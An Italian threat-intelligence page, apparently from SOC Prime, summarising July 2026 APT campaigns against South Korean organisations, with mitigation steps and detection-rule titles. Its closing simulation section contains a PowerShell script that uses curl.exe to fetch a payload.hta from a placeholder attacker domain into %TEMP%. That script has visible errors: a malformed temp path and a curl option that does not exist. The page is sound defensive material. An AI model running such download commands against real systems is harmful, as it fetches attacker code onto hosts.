SOC Prime Bias: Critical

31 Aug 2026 06:13 UTC

Rapporto sulle Minacce APT in Corea del Sud: Tendenze di Luglio 2026

Author Photo
SOC Prime Team linkedin icon Segui
Rapporto sulle Minacce APT in Corea del Sud: Tendenze di Luglio 2026
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riepilogo

AhnLab riporta un aumento dell’attività APT che prende di mira organizzazioni sudcoreane attraverso campagne di spear-phishing. Gli attacchi si basano principalmente su file LNK dannosi per consegnare payload inclusi script PowerShell, script AutoIt e backdoor. Le tecniche comuni includono la persistenza tramite Task Scheduler e l’esfiltrazione dei dati tramite servizi come Dropbox e PubNub.

Indagine

L’indagine si è concentrata sull’infrastruttura APT utilizzata contro entità sudcoreane durante il luglio 2026. Gli analisti hanno raggruppato l’attività in diversi tipi di attacco, da A a G, basandosi su metodi di consegna e caratteristiche funzionali. I ricercatori hanno anche identificato comportamenti tra cui il DLL side-loading e l’abuso di utilità native di Windows come curl.exe per il recupero del payload.

Mitigazione

Gli utenti dovrebbero verificare l’identità del mittente ed evitare di aprire allegati ricevuti da fonti sconosciute o non affidabili. Le organizzazioni dovrebbero mantenere aggiornati i sistemi operativi e i browser web con le ultime patch di sicurezza. È inoltre raccomandato mantenere soluzioni antivirus e di protezione degli endpoint aggiornate come V3.

Risposta

Se vengono rilevati file LNK sospetti o voci non autorizzate nel Task Scheduler, gli operatori di incident response dovrebbero isolare immediatamente l’host interessato. Dovrebbero essere eseguite analisi forensi della memoria per identificare backdoor iniettate o DLL dannose. I log di rete dovrebbero essere esaminati per connessioni in uscita insolite verso servizi di hosting file o canali di comando e controllo come PubNub.

Flusso di Attacco

Stiamo ancora aggiornando questa parte.

Rilevamenti

Comportamento Sospetto di Evasione della Difesa MSHTA LOLBAS tramite Rilevamento di Comandi Associati (via process_creation)

Squadra SOC Prime
28 Ago 2026

Utilizzo Sospetto di CURL (via cmdline)

Squadra SOC Prime
28 Ago 2026

Task Pianificato Sospetto (via audit)

Squadra SOC Prime
28 Ago 2026

Possibile Infiltrazione/Esfiltrazione di Dati/C2 tramite Servizi/Terze Parti (via proxy)

Squadra SOC Prime
28 Ago 2026

Possibile Infiltrazione/Esfiltrazione di Dati/C2 tramite Servizi/Terze Parti (via dns)

Squadra SOC Prime
28 Ago 2026

IOC (HashMd5) da rilevare: Rapporto sulle Tendenze delle Minacce di Luglio 2026 su Attacchi APT (Corea del Sud)

Regole AI SOC Prime
28 Ago 2026

Curl.Exe Usato per Scaricare ed Eseguire File Dannosi [Windows Sysmon]

Regole AI SOC Prime
28 Ago 2026

Rilevare Comandi PowerShell Dannosi all’interno di File LNK [Windows Powershell]

Regole AI SOC Prime
28 Ago 2026

Esecuzione della Simulazione

Prerequisito: Il Controllo Preparatorio Telemetria & Baseline deve essere passato.

Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare l’esatta telemetria prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a errori di diagnostica.

  • Narrazione & Comandi dell’Attacco: L’avversario intende utilizzare curl.exe per scaricare un file HTA dannoso nella %TEMP% directory per stabilire una base operativa. Per testare se la logica di rilevamento corrente funziona (poiché cerca specificamente le parole “download” o “execute”), l’attaccante utilizzerà una linea di comando che include esplicitamente queste parole come parte di un argomento falso o descrizione, simulando uno script male costruito o un tentativo specifico di imitare il pattern che il SOC sta cercando.

  • Script di Test di Regressione:

     # Simula un avversario usando curl con le parole chiave specifiche richieste dalla regola
      $tempPath = $env:TEMPmalicious.hta
      $url = "http://attacker-controlled-domain.com/payload.hta"
    
      # Questo comando è creato specificamente per attivare la logica 'contains' della regola
      # includendo le parole 'download' ed 'execute' nella stringa della linea di comando.
      Start-Process "curl.exe" -ArgumentList "-L $url -o $tempPath --comment 'download and execute this file'"
  • Comandi di Pulizia:

     # Rimuovi il file fittizio creato durante la simulazione
      if (Test-Path "$env:TEMPmalicious.hta") {
          Remove-Item -Path "$env:TEMPmalicious.hta" -Force
      }